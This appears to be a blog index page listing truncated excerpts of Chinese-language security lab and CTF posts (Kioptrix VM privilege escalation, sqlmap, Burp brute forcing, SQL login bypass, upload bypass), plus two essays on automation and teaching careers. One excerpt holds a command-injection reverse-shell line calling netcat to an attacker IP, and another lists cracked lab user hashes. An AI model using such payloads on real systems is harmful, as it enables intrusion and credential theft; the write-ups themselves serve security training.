level-2-(nc与内核漏洞提权) 续上篇 192.168.1.1;/usr/local/bin/nc 攻击机ip 6666 -e /bin/sh ::: {.image-package}\ ::: {.image-caption}:::::: 于是获得了 sh类型的shell 攻击机输入下面命令,目的是监听666端口,如果有主机连上它,就发送hole.c ::: {.image-package}\ ::: {.image-c 2017-11-01 training
level-3-下集(wget与提权) sqlmap获取数据库用户密码的hash值。参考 获得信息用户名:dreg hash值:0d3eccfb887aabd50f243b3f155c0f85 解密后:Mast3r 用户名:loneferret hash值:5badcaf789d3d1d09794d8f021f40f0e 解密后:starwars sqlmap -u "kio 2017-11-01 training
level-4-布尔盲注 ::: {.container}::: {.post}::: {.show-content}(下载地址见以前的文章)该虚拟机下载下来后只有一个vmdk文件,要创建一个新建一个虚拟机才能使用,方法详情 按例扫描IP和端口,信息搜集如下: 192.168.1.107 22(ssh)、80(http)、139(Samba)、445 22端口版本 OpenSSH 4.7p1 80端口 2017-10-31 training
kiotrix靶机(139端口samba) 靶机下载地址 攻击机kali linux:192.168.1.111 靶机kiotrix level 1linux:192.168.1.104 unicornscan -mT -r500 -I 192.168.1.104 unicornscan -mU -r500 -I 192.168.1.104 先扫所有TCP端口、再扫UDP端口。 -mT 默认tcp扫描 -r500 每秒发送500个数据 2017-10-01 training
Burp暴力破解 ::: {.container}::: {.post}::: {.show-content}参考:http://www.freebuf.com/sectool/3693.html (网上教程很多,我就不重复造轮子了) 最近又有一个比赛,信息安全铁人三项赛,第二场web方向的,拿到出题方给的5.2G题目后,在本机虚拟机开始实验。 ::: {.image-package}\ ::: {.image- 2017-03-27 ctf
和机器共生 和机器共生,而不是被机器淘汰 很多职业都是有着一种历史感,比如 剃头匠 木匠 电话总机接线员弹棉花手艺人\ 司机:自动驾驶汽车取代司机是一个持续缓慢改变的过程。 自驾汽车成本会逐渐降低,汽车成本较(司机酬劳+普通汽车成本)足够低廉时,人类驾驶技能将会成为和五笔打字输入法一样的地位。 翻译:逐渐取代低级翻译者,不能取代要求语言艺术性精确性的文字翻译,以及特殊场合的口语翻译官。2023.5.30 不要 2017-03-23 View
成为光荣的人民教师 ::: {.container}::: {.post}::: {.show-content} 昨天我奶奶给我打电话,,提到就业的事情就是当老师啥的,嗯? 于是我就想分析一下,当老师真的那么好吗? 老龄化社会旧标准,60岁以上人口占总人口10% 新标准,65岁以上人口占总人口7% 中国于2000年进入老龄化社会(60岁以上人口达1.3亿人,占总人口10.2%。摘自百度百科,2010年第六次人口普查 2017-02-23 View
sql绕过登陆表单 靶机下载地址:https://sourceforge.net/projects/owaspbwa/files/ sql注入是在web端很常见的漏洞,主要是因为对于用户与数据库的操作,没有审查。比如,用户搜索叫做socks的商品,用sql结构化查询语句来检索数据库,使用selectsocks from 表名称 对于数据库的操作,一般有 SELECT、INSERT、UPDATE、 DELETE 比如说 2017-02-02 ctf
BC07hashkill 6ac66ed89ef9654cf25eb88c21f4ecd0是flag的MD5码,(格式为ctf{XXX_XXXXXXXXXXX_XXXXX})由一个0-1000的数字,下划线,纽约的一个区,下划线,一个10000-15000的数字构成。 这是一个很典型的题目。用到了一些字符串的组合,和对比。\ 分析:MD5加密,导入hashlib模块。有三个部分组合成flag。 知识点一:hashlib的使 2017-02-01
上传绕过(burp) 先传txt,提示需要jpg; 再传jpg,,提示需要php(见下图) 再传php,提示需要jpg。 em.......….到底需要上传jpg还是php呢? ::: {.image-package}\ ::: {.image-caption}:::::: ::: {.image-package}\ ::: {.image-caption}:::::: 分析:首先,知道题目只允许jpg,gif,pn 2017-02-01